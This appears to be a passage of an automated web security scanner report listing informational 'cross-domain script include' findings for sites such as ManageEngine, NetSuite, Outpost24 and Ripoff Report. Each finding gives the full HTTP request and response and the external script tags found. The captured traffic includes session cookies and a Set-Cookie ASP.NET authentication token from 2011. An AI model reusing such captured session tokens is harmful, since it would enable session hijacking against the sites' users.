<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
24.87. http://www.manageengine.com/products/security-manager/store.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manageengine.com
Path:   /products/security-manager/store.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/security-manager/store.html HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/?gclid=CL-9_6TPt6gCFQTe4AodlRiOCw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.4.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:12:03 GMT
Server: Apache
Last-Modified: Wed, 23 Mar 2011 11:51:49 GMT
ETag: "b67e-49f24fc659f40"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Mon, 02 May 2011 12:12:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 46718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><!-- Instan
...[SNIP]...
<!-- InstanceBeginEditable name="head" -->
<script src="https://mestore.store.zoho.com/storeapi.na" type="text/JavaScript"></script>
...[SNIP]...
</script>
<script language="javascript" src="https://iplocation.zoho.com"></script>
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
24.88. https://www.manageengine.com/network-performance-management.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.manageengine.com
Path:   /network-performance-management.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /network-performance-management.html HTTP/1.1
Host: www.manageengine.com
Connection: keep-alive
Referer: https://store.manageengine.com/service-desk/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.13.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:15:18 GMT
Server: Apache
Last-Modified: Thu, 24 Mar 2011 09:27:38 GMT
ETag: "b11e-49f3716993680"
Accept-Ranges: bytes
Cache-Control: max-age=-2170060
Expires: Thu, 31 Mar 2011 09:27:38 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 45342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t5.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...
24.89. https://www.manageengine.com/products/security-manager/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.manageengine.com
Path:   /products/security-manager/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products/security-manager/index.html HTTP/1.1
Host: www.manageengine.com
Connection: keep-alive
Referer: https://store.manageengine.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.10.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:13:51 GMT
Server: Apache
Last-Modified: Wed, 23 Mar 2011 11:51:49 GMT
ETag: "d3ec-49f24fc659f40"
Accept-Ranges: bytes
Cache-Control: max-age=-2247722
Expires: Wed, 30 Mar 2011 11:51:49 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 54252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><!-- Instan
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
24.90. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketgid.com
Path:   /pnews/773204/i/7269/pp/2/1/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pnews/773204/i/7269/pp/2/1/ HTTP/1.1
Host: www.marketgid.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MGformStatus=2; __utma=250877338.2141066310.1303423654.1303423654.1303423654.1; __utmz=250877338.1303423654.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/14|utmcmd=referral; __gads=ID=909f464f6199feed:T=1303423666:S=ALNI_MY6fIaxdoRzO_fDyTrK1Li9f5G69A; __qca=P0-972785183-1303423664935

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:31:32 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=20
Cache-Control: no-cache, must-revalidate
Content-Length: 48728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</ul>
           <script type="text/javascript" src="http://foreign.dt00.net/zones/form4.js"></script>
...[SNIP]...
<!-- mgads banner code begin -->
<script type="text/javascript" src="http://foreign.dt00.net/zones/zone23.php?country=4&amp;region=0"></script>
...[SNIP]...
<!-- START BANNER ZONE 19 //-->
<script type="text/javascript" src="http://foreign.dt00.net/zones/zone19.php?country=4&amp;region=0"></script>
...[SNIP]...
</noscript>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://storage.trafic.ro/js/trafic.js"
></script>
...[SNIP]...
24.91. http://www.netdiligence.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netdiligence.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.netdiligence.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:28:57 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13875

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

   <head>
       <title>NetDiligence&reg;&ndash;Cyber Risk Management Services</title>
       <meta h
...[SNIP]...
</style>        
       <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
       <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.7/jquery-ui.min.js"></script>
...[SNIP]...
24.92. http://www.netsuite.com/portal/products/ecommerce/website-hosting.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netsuite.com
Path:   /portal/products/ecommerce/website-hosting.shtml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /portal/products/ecommerce/website-hosting.shtml HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NS_VER=2011.1.0; __utmz=1.1303742452.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=k23zN1HJzNw2PWHTMzr6q1LqT1Q41y9Tz2M0V9JvpTH0mJ5TfxDLbGQpDm2qpc2ThmqSMyK39KWhLDnCtK6fYxHWtxqSfGGZGG53PyJw5wXyXYk1y7kppJz4hQqHll7q!-577847599; NLVisitorId=rcHW8495Af7oGhFy; NLShopperId=rcHW8495AQLpGtOI; bn_u=6923519460848807096; __utma=1.1781939456.1303742452.1303742452.1303742452.1; __utmc=1; __utmb=1.5.10.1303742452; mbox=session#1303736347554-914602#1303745022|PC#1303736347554-914602.17#1304952762|check#true#1303743222; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fpage_not_found.shtml%22%2C%22r%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fpages%2Fportal%2Fpage_not_found.jspinternal%3DT%22%2C%22t%22%3A1303743275975%2C%22u%22%3A%226923519460848807096%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fecommerce%2Fwebsite-hosting.shtml%22%2C%22l%22%3A%22Ecommerce%20-%20SEO%22%2C%22de%22%3A%7B%22su%22%3A%22NetSuite%20for%20mid-sized%20businesses%20adds%20advanced%20accounting%2C%20customer%20relationship%20management%2C%20and%20SFA%20to%20the%20NetSuite%20family.%20Includes%3A%20NetSuite%20Accounting%2C%20NetSuite%20CRM%2C%20NetSuite%20SFA%2C%20NetSuite%20Knowledge%20Base%2C%20and%20NetSuite%20Vendor%20Center.%22%2C%22ti%22%3A%22NetSuite%20%7C%20Form%22%2C%22nw%22%3A173%2C%22nl%22%3A46%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
Content-Disposition: inline;filename="website-hosting.shtml"
NS_RTIMER_COMPOSITE: 677094517:73686F702D6A6176613030312E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=F
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 15:19:56 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 37989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<!-- Google Analytics code -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">

</script>
...[SNIP]...
24.93. http://www.outpost24.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outpost24.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?gclid=CIzv2JrPt6gCFQUQNAod6VpNBg HTTP/1.1
Host: www.outpost24.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wooTracker=Z0OLUUFD2A8CJ3SSJOPK3JITJKI5488S; wooMeta=MTA0MTM1JjEmMSYyNDI5MzYmMTMwMzczMjgxODc3OCYxMzAzNzMzMDYxNjk3JiYxMDAmJjUwMDExNSYmJiY=

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:52:27 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 12630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       
...[SNIP]...
<![endif]-->
       <script src="http://www.google-analytics.com/urchin.js" type="text/javascript" language="JavaScript1.2" />
       <script type="text/javascript" language="JavaScript1.2">
...[SNIP]...
</script>
       <script src="http://static.woopra.com/js/woopra.js"></script>
...[SNIP]...
24.94. http://www.outpost24.com/products.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outpost24.com
Path:   /products.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products.html HTTP/1.1
Host: www.outpost24.com
Proxy-Connection: keep-alive
Referer: http://www.outpost24.com/?gclid=CIzv2JrPt6gCFQUQNAod6VpNBg
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wooTracker=Z0OLUUFD2A8CJ3SSJOPK3JITJKI5488S; wooMeta=MTA0MTM1JjImMiYzNjM4NDYmMTMwMzczMjgxODc3OCYxMzAzNzM2MDY4MzgwJiYxMDAmJjUwMDExNSYmJiY=

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:54:40 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 13355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       
...[SNIP]...
<![endif]-->
       <script src="http://www.google-analytics.com/urchin.js" type="text/javascript" language="JavaScript1.2" />
       <script type="text/javascript" language="JavaScript1.2">
...[SNIP]...
</script>
       <script src="http://static.woopra.com/js/woopra.js"></script>
...[SNIP]...
24.95. http://www.reputationchanger.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reputationchanger.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.reputationchanger.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:03:55 GMT
Server: Apache
Last-Modified: Tue, 12 Apr 2011 15:44:10 GMT
ETag: "7e5261-4ccb-4a0ba902be680"
Accept-Ranges: bytes
Content-Length: 19659
Connection: close
Content-Type: text/html

<html>
<head>
<title>Online Reputation Management Remove name from Internet Remove name from Google - Reputation Changer</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...
<img src="images/smalllogo.png" width="154" height="55">&nbsp;<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.reputationchanger.com&amp;size=M&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
24.96. http://www.reputationchanger.com/scheduled.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reputationchanger.com
Path:   /scheduled.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /scheduled.html HTTP/1.1
Host: www.reputationchanger.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:06:11 GMT
Server: Apache
Last-Modified: Tue, 12 Apr 2011 15:44:14 GMT
ETag: "7e5263-1ea5-4a0ba9068ef80"
Accept-Ranges: bytes
Content-Length: 7845
Connection: close
Content-Type: text/html

<html>
<head>
<title>Reputation Changer</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link rel="Shortcut Icon" href="images/rc.ico">
<link rel="icon" href="images/r
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<!-- DO NOT CHANGE :
Conversion may not be recorded correctly if altered.
Please generate new code from pulse360.com instead.
-->
<script
type="text/javascript"
language="JavaScript"
src="http://track.pulse360.com/cgi-bin/tracker.cgi?id=92952183&type=signups"
>
</script>
...[SNIP]...
24.97. http://www.ripoffreport.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ripoffreport.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.ripoffreport.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 16:19:28 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Cache-Control: public, max-age=600
Expires: Mon, 25 Apr 2011 16:16:01 GMT
Last-Modified: Mon, 25 Apr 2011 16:06:01 GMT
X-AspNet-Version: 2.0.50727
ROR-NODE: 04
Content-Length: 150246


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"
...[SNIP]...
</script>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xcentricventures"></script>
...[SNIP]...
24.98. http://www.ripoffreport.com/ConsumerResources.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ripoffreport.com
Path:   /ConsumerResources.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ConsumerResources.aspx HTTP/1.1
Host: www.ripoffreport.com
Proxy-Connection: keep-alive
Referer: http://www.ripoffreport.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=38277280.1303747675.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=38277280.797691246.1303747675.1303747675.1303747675.1; __utmc=38277280; __utmb=38277280.1.10.1303747675

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 16:25:07 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Cache-Control: public, max-age=345600
Expires: Tue, 26 Apr 2011 05:08:43 GMT
Last-Modified: Fri, 22 Apr 2011 05:08:43 GMT
X-AspNet-Version: 2.0.50727
ROR-NODE: 16
Content-Length: 61937


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"
...[SNIP]...
<link href="/common/style/page.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xcentricventures"></script>
...[SNIP]...
24.99. http://www.ripoffreport.com/CorporateAdvocacy.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ripoffreport.com
Path:   /CorporateAdvocacy.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /CorporateAdvocacy.aspx HTTP/1.1
Host: www.ripoffreport.com
Proxy-Connection: keep-alive
Referer: http://www.ripoffreport.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=38277280.1303747675.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=38277280.797691246.1303747675.1303747675.1303747675.1; __utmc=38277280; __utmb=38277280.1.10.1303747675

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 16:25:02 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Cache-Control: public, max-age=345600
Expires: Tue, 26 Apr 2011 06:06:05 GMT
Last-Modified: Fri, 22 Apr 2011 06:06:05 GMT
X-AspNet-Version: 2.0.50727
ROR-NODE: 12
Content-Length: 32784


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"
...[SNIP]...
<link href="/common/style/page.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"></script>
...[SNIP]...
<div class="bannerAd">
<script src="http://go2.ctrhub.com/aff_ad?campaign_id=4&aff_id=46&format=js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xcentricventures"></script>
...[SNIP]...
24.100. http://www.ripoffreport.com/LoginPage.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ripoffreport.com
Path:   /LoginPage.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /LoginPage.aspx HTTP/1.1
Host: www.ripoffreport.com
Proxy-Connection: keep-alive
Referer: http://www.ripoffreport.com/ConsumerResources.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=38277280.1303747675.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=38277280.797691246.1303747675.1303747675.1303747675.1; __utmc=38277280; __utmb=38277280.2.10.1303747675

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 16:25:18 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXAUTH=204DAD60EB1BBD88C59E5F5F9173063C696A0F7001F3DAB68B91E49725FD98FA9004A1B768AD6C5CCF6FC284A723C82A4AE351B51D920A7472D17715227F8C8F5EA7067B1EC089AE4B0F0AD2D9D779F79D62DB169E8EB4A2EDB1833E9FBFB093E1F7AA47EC45274B2DB2BA709F7D2D261236D9197EEE8A4CF97B216F06C285E994CAAB0AF14BE9CF81CF25F5779A8377F57F2E3A93FF28013B612CC450AC879DDF0FFF87E5F1BFA2EA945555182C4ADA; expires=Wed, 25-May-2011 16:13:07 GMT; path=/; HttpOnly
P3P: CP="NON DSP COR ADM DEV HIS OTPi OUR IND STA"
ROR-NODE: 09
Content-Length: 18684


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"
...[SNIP]...
<link href="/common/style/page.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xcentricventures"></script>
...[SNIP]...
24.101. http://www.stillsecure.com/company/testimonials.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stillsecure.com
Path:   /company/testimonials.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /company/testimonials.php HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/library/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.4.10.1303732858

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:04 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 24091

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Network security software</title>
<style
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
